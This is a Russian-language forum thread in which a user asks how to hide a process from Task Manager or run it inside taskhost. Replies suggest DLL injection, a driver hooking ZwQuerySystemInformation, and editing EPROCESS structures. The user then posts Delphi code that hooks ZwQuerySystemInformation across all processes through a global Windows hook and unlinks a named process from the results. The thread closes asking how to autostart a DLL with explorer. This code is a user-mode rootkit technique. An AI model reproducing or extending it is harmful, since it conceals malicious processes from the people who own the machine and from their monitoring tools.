Скрыться от taskmanager'a или как запуститься в taskhost?

[Кольша]

Всем привет задался тут вопросом исключительно в своих целях и во благо как можно скрыться от диспетчера задач?? Или как запуститься в taskhost'e почему в нем?да просто нашел исходник плеера какого то и обнаружил что он запускаеться в taskhost и если убить его то прога все равно работает весь исх. перерыл не нашел как так.

[Rock-n-Rolla]

http://pblog.ru/?p=317

Цитата:

В архиве так же есть пример скрытия процесса lsass.exe.

[Кольша]

нет не подходит там dll'ка используется

[rpy3uH]

Цитата:

Сообщение от Кольша

нет не подходит там dll'ка используется

как вариант можно сделать внедрение конкретно в диспетчер, в этом случае DLL не обязательна, но задача усложняется

[Sam Gold]

Цитата:

как можно скрыться от диспетчера задач??

Также можно написать драйвер, который перехватывает ZwQuerySystemIformation, но в Win Vista и Win7 не проканает. Или править структуры EPROCESS. В Win Vista и Win7 работать будет, но будут и проблемы.

[Кольша]

мне нужно что бы без лишних файлов все в одном exe

[rpy3uH]

Цитата:

Сообщение от Кольша

мне нужно что бы без лишних файлов все в одном exe

написать базонезависимый код, который осуществляет перехват функции ZwQuerySystemINformation и внедрять его во все процессы или только в task manager, но это уже не так надёжно

[Кольша]

Код:

unit Hider;
interface
uses
  Windows,
  ExtendedAPIFunctions, 
  apihooktools;

const
  MutexName='__API_HOOK';

var
  SH:HHOOK = 0;
  MutexHandle:THandle;
  HiddenProcess:widestring = 'AIMP3.exe';

  SystemFunctionBridge:TFunctionRestoreData;
procedure hideprocess(hp:widestring);
implementation
function NewSystemFunction(ASystemInformationClass: DWORD; ASystemInformation: Pointer;
   ASystemInformationLength: DWORD; AReturnLength:PCardinal): NTStatus; stdcall;
var
  info,back_Proc:PSYSTEM_PROCESSES;
begin
  UnHookCodeHook(@SystemFunctionBridge);
  Result:=ZwQuerySystemInformation(ASystemInformationClass,ASystemInformation,ASystemInformationLength,AReturnLength);
  SetCodeHook(SystemFunctionBridge.Address,@NewSystemFunction,@SystemFunctionBridge);
  
  if ASystemInformationClass<>SystemProcessesAndThreadsInformation then exit;
  if Result<>STATUS_SUCCESS then exit;

  info:= ASystemInformation;
  repeat
    if lstrcmpiW(info^.ProcessName.Buffer, PWideChar(HiddenProcess))=0 then
     begin
      back_Proc^.NextEntryDelta:=back_Proc^.NextEntryDelta+info^.NextEntryDelta;
        {делаем так что бы предыдущая запись указывала на следующию тем самым
         пропуская текущюю, именно так и достигается скрытие процесса}
     end;
    back_Proc:=info;
    Info := pointer(dword(info) + info^.NextEntryDelta);
  until Info^.NextEntryDelta = 0;
end;

function MsgProc(code:DWORD;wParam,lparam:DWORD):DWORD;stdcall;
begin
  Result:=CallNextHookEx(SH,code,wParam,lparam);
end;

procedure SetWindowsHook(e:Boolean); stdcall;
var
  M:THandle;
begin
  if e then
   begin
    M:=CreateMutex(0,false,MutexName);
    if GetLastError<>ERROR_ALREADY_EXISTS then
     begin
     SH:=SetWindowsHookEx(WH_GETMESSAGE,@MsgProc,HInstance,0);
     MutexHandle:=M;
    end                                   else
    CloseHandle(M);
   end
       else
   begin
    UnhookWindowsHookEx(SH);
    CloseHandle(MutexHandle);
   end;
end;
      
procedure DLLEntryPoint(dwReason:DWord);
begin
  case dwReason of
    DLL_PROCESS_ATTACH:
     begin
     // StopProcess(GetCurrentProcessId);
      SetWindowsHook(true);
      SetProcedureHook(GetModuleHandle('ntdll.dll'),'ZwQuerySystemInformation',@NewSystemFunction,@SystemFunctionBridge);
     // ResumeProcess(GetCurrentProcessId);
     end;
    DLL_PROCESS_DETACH:
     begin
     // StopProcess(GetCurrentProcessId);
      UnHookCodeHook(@SystemFunctionBridge);
      SetWindowsHook(false);
      //ResumeProcess(GetCurrentProcessId);
     end;
   end;
end;
procedure hideprocess(hp:widestring);
begin
hiddenprocess:=hp;
   DllProc:= @DLLEntryPoint; 
   DLLEntryPoint(DLL_PROCESS_ATTACH);
   end;

вот часть кода без вот

Код:

ExtendedAPIFunctions, 
  apihooktools

этих юнитов в dll работает на ура а вот в exe не хочет!

[rpy3uH]

этот код основывается на том что при установке любого хука (стандартного виндового хука), DLL с обработчиком загружается во все процессы. собственно, это и есть самый простой способ внедрить свой код во все процессы. но можно это делать вручную, но эта задача явялется на порядок сложной чем с помощью DLL

[Кольша]

можно попожробней ссылки и подобное.P.S где то прочитал что можно сделать dll'ку типа системной что она вместе с explorer'om запускаеться, но как это сделать?